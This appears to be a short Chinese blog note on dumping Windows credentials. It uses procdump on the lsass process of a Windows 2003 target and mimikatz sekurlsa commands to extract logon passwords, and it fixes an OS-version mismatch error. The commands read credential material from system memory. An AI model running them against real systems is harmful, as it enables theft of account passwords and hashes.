最近抓系统hash的时候,遇到了些问题。1
目标机:windows 2003 X86
破解lsass.dmp
首先利用procdump获取到lsass.dmp,运用mimikatz.exe解密该文件。注:32位就用32位的mimikatz破,同理64位的也是。1
2
3privilege::debug
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full
结果发现报错:
1
ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->MajorVersion (5) != MIMIKATZ_NT_MAJOR_VERSION (6)
查阅网上资料,原来破解lsass.dmp文件是需要系统内核版本一一对应的。比如在win03系统上获取到lsass.dmp文件要在win03下运行mimikatz破解,当然了在xp下运行mimikatz破解也是可以的,只要内核版本一样就行。
于是换了台机器成功破解lsass.dmp
抓系统hash不限于该方法,从注册表里导出hash也是不错的选择。